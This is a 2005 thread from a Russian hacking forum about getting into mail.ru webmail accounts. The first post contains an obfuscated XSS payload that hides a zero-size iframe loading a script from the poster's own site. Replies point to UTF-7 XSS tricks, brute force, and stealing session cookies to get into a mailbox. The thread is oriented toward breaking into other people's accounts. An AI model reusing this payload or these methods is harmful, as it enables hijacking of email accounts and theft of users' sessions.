Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   проблема с mail.ru (https://forum.antichat.xyz/showthread.php?t=7286)

unhappy 19.06.2005 17:46

проблема с mail.ru
 
сделал все как написано в вашей статье, себе на сайт залил файл с формой, а на нужный мыльник отправил
Код HTML:

<embed src="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58status=location;document.getElementById('xxx').innerHTML='<&#105&#102&#114&#97&#109&#101 src=http://yoursite.ru/yourscript.html width=0 height=0></&#105&#102&#114&#97&#109&#101>';this.wav" width=0 height=0> <p id='xxx'>
мыльник который хочу сломать - мой =) т.е. я знаю от него пароль, просто на своём эксперементирую =) когда я открыл тот ящик куда пришел выше указанный код, я заметил, что, по идее хтмл кода-то не должно быть видно, а он походу отфильтровывается теперь...т.е. код отосланный мной, его видно в письме, и он, естессно, не пашет...
зы: вначале письмо в хтмл формате (не аттачем)...
вот...че такое?

Майор 19.06.2005 17:54

там поставили новые фильтры
теперь c наличием xss - там проблема

DRON-ANARCHY 19.06.2005 18:18

Мдя...Mail.ru обновился....

unhappy 19.06.2005 18:32

*** и чего...теперь там дыр нету? как еще можно ломануть? =)
зы: социнженерью не предлагать...

from moderator : не матерись

Майор 19.06.2005 19:11

Почитайте "Использование UTF-7 в атаках класса XSS"

GreenBear 19.06.2005 19:12

раз не СИ, так брут -)

JazzzSummerMan 19.06.2005 19:19

найти XSS еще не значит ломануть. С её помощью там ничего не сделаешь, только настроишь пересылку, что весьма затруднительно реализовать. Ну или просто зайдешь в ящик, похитив куки.
А пример рабочей XSS вот здесь можно найти
http://forum.antichat.ru/showthread....st46400&conly=

Майор 19.06.2005 19:31

Цитата:

Сообщение от JazzzSummerMan
найти XSS еще не значит ломануть. С её помощью там ничего не сделаешь, только настроишь пересылку, что весьма затруднительно реализовать. Ну или просто зайдешь в ящик, похитив куки.
А пример рабочей XSS вот здесь можно найти
http://forum.antichat.ru/showthread....st46400&conly=

уже не пашет


Время: 03:28